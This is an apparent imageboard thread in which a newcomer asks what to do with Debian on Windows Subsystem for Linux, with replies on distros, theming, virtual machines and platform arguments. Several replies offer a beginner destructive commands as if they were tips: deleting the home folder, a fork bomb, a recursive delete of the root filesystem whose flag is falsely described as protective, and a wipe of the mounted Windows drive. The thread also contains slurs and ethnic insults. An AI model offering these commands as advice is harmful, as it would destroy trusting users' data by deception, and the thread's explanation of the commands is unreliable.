So, I installed Debian as a Linux Subsystem on Windows 10, what should i do wth it first? inb4 "use a real os"

So, I installed Debian as a Linux Subsystem on Windows 10, what should i do wth it first? inb4 "use a real os"

Attached: ApplicationFrameHost_2018-09-03_20-50-19.png (724x250, 12K)

sudo rm -rf ~/

You wont get the performamce boost of using Linux but be free to break it, try some hard ricing or using it as an actual server, that way you wont have problems when migrating, say, laravel apps

Im trying to see how far i can rice it, but im a complete pleb in terms of using Linux, im also trying to learn it here so i might be able to understand it better later on

Write an I/O intensive application.

Delete Shitdows.
Then install Debian only.
Enjoy!

Ive tried running it in a virtual machine, trying to get my dick wet, little by little, im not quite ready to go completely balls deep here

So far, all ive done on it is get screenfetch, whats the next step?

Attached: debian_2018-09-03_21-09-50.png (635x271, 48K)

Uninstall loonix.

Why? its just a subsystem

start some DE in the x server..., I've heard it's possible but I want to see

Honestly, if you wanna get into Linux just install an Ubuntu distro. Don't let Jow Forums bullshit you. I recommend latest Xubuntu

>lightweight
>easy to rice
>xfce kick ass
>logo is cute mouse

This post speaks the truth

See, i tried to dual boot Ubuntu using an external hard drive, in hindsight, it was a dumb idea, because the external hard drive didnt start reading until it booted to an OS, so id get fucked and get stuck at the grub boot menu. Ended up having to reinstall all of Windows and lost a whole partition on the drive

What exactly does this do?

Attached: 1526670658959.jpg (600x536, 71K)

Womp womp. Try not doing that.

I don't know why Jow Forums gives people shit for this.
I wouldn't have stuck with Linux as a boot partition if I hadn't used it for long enough in a VM before the fact.

There is no reason why you should have to go all in, a VM lets you familiarize yourself with it, see the benefits of the OS and give you experience to make the transition seamless.
And you can do it all in a window while running your existing setup until you're ready to switch.

Attached: 1513652300084.webm (1280x720, 571K)

Anyone here know how i can get the tiitlebar to hide itself in the terminal on a subsystem?

> I don't know why Jow Forums gives people shit for this.
90% of Jow Forums gets made fun of for being a meek loser in everyday life, so they're pretty ready to jump on any opportunity to belittle someone other than themselves on The Internet.

Sad, really.

screenfetch

see

there is nothing wrong with using linux in a VM desu
they're just retarded

Alright, so update
After thinking a bit, im running xubuntu in virtualbox, now i ask, how do i rice this shit?

copypaste some commands and see what happens, like

:(){ :|:& };:

Enjoy!

its the other way around
>debian
>winshit in a vm

Attached: gnudebian.jpg (371x323, 49K)

Nice try

Im in here, what now?

Attached: 2018-09-03-223017_1920x1080_scrot.png (1920x1080, 1.39M)

Set WM theme to Numix, install paper theme, set wallpaper to vaporwave, and change the font to something more to your liking - I'm partial to IBM Plex.

If you have no reason to use Linux, then just don't.

Im trying to see what it has to offer, plus im bored

deletes root folder

figured as much

It's already a reality.
I love it, both linux and windows binaries being run at the same time natively within one system, no need to bother with the hassles of running a VM and dividing a noticeable chunk of memory, or dualbooting, taking a significant storage space.
Only issue is that I/O performance isn't as fast as bare metal, but that's not a bother.

Attached: Screenshot (23).png (1920x1080, 957K)

Have a link to a video or something explaining how to do this?

cursed image

Why must you hate what you don't understand?

*neofetch

rm winblowz

Imagine being this retarded

It's literally Linux without any of the goods parts of Linux

*GNU
It's GNU without Linux or systemd

Just search 'xfce wsl'; I didn't follow any videos because there's plenty of blogs detailing it

On xfce?
Just change the preferences, jesus

Linux was never meant to be run on physical hardware, it's only great as a server in VM

>Not deleting his windows drive
You're an idiot

Jesus you're stupid

Debian in VM using Windows as host. Ayy lmao.

No sign of Linux there at all

>FX-6300
Kill yo self

Please don't post ja/ck/ outside of his containment threads. I get so upset watching that man do anything.

Attached: 58231_410915238986128_1347346218_n.jpg (303x322, 28K)

It doesn't, brainlet. ~/ is the user home folder. If you want to delete the root folder, use sudo rm -rf /

disable Pocket

Oh, that's nice. Since Windows runs Linux programs so fine then it makes more sense developing for Linux as you'll now be able to reach both Linux and Windows users. Year of Linux desktop comes closer.

Makes more sense to develop for the 95% of the market, especially since you only need Windows to develop for all platforms now, without all the bugginess of loonix or the cage of appleshit.

took wine more than 23 years, and it still can't properly run the latest aidsdobe shit. meanwhile microsoft in just two years managed to ran 99% of linux binaries.

>GNU/Linux is open source
>Windows is closed source
>"Wow Wine is stupid for not being able to make Windows programs run without actual Windows. But Microsoft can make Linux programs run on Windows within two years!"
This is how stupid you are.

>a sideproject ran by a pajeet and brownskin coders literally outdoes a decades-old program that supposedly has "countless eyeballs", "skilled volunteers", "open progress" and any other buzzwords
So this is....the power of....free software.....damn..........

You're a retard. Do you per chance know why it took wine 23 years? Macroshaft shit is proprietary and closed source, the wine developers have to rely on reverse engineering and the poorly documented Wangblows API to remotely even be able to translate Wongshaft binaries in real time. The Linux kernel and it's related ecosystem of software is open source, if you know what the fuck your code is doing it's literally 1000x easier to port it into your platform. Wine is a fucking feat of software engineering.

All you have to do to run GNU/Linux is importing it onto your system and let it execute. That's not too difficult to do. But in order to get Windows programs to run in a non Windows environment, you have to manually, try to reverse engineer the way the programs react to certain resources, what they need, errors that pop up, a lot of debugging, etc. because you're literally working in the dark, with a black box, since you have literally no idea how Windows works exactly. And if they got a sight on some of the source code, that would make the whole Wine thing illegal, since it'd use copyrighted code.

>managed to ran
Can you managed to learned proper English?

holy shit rajeesh ur dum

> what should i do wth it first?
Uninstall.

Maybe try to understand what I wrote?
Of course it did considering Windows native API is closed, Linux is open and clean room implementation is the only way to make Wine.
Those, and NT allowing to use multiple programmatic interfaces (subsystems) outside the kernel as user modules in client/server fashion. (Yeah, NT is good. Win32 is what makes Windows shit.)

unless you're in a position where you don't care about bricking your computer constantly, there is nothing wrong with starting slow

Too easy.

>"haha i was just pretending to be retarded"
Fuck off back to plebbit, faggot.

Don't forget the flag!

This just proves to me that Jow Forums is nothing but memers who've never actually used a computer.

WSL all the bullshit of looneex & none of hter benefits

get comfortable enough to install Debian for real

prepare yourself for the oncoming storm

Attached: gnugle.png (680x393, 66K)

Attached: debian.jpg (352x352, 40K)

It's been unironically making developers dump macshit

sudo rm -rf --no-preserve-root /
Unlike the other derivatives of this mentioned in the thread, --no-preserve-root is going to treat system root as a special folder and will not allow you to delete it. Sounds pointless but it's worth doing for the funny system messages alone.

sudo rm -rf --no-preserve-root /*

sudo rm -fdr /mnt/c would probably be more effective given is is running on windows

I literally know 10x more languages frameworks and libraries than you, faggot

SCREENTEARING IN 2018
AHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHAHAHSHAHAHAHAHAHAHAHAAHAHAHAHHAHAHAHAAHAHAAHAH

The Apple Macbook Pro with Retina Display doesn't have this problem.

>The Apple Macbook Pro
Get out

It's the official laptop of Jow Forums.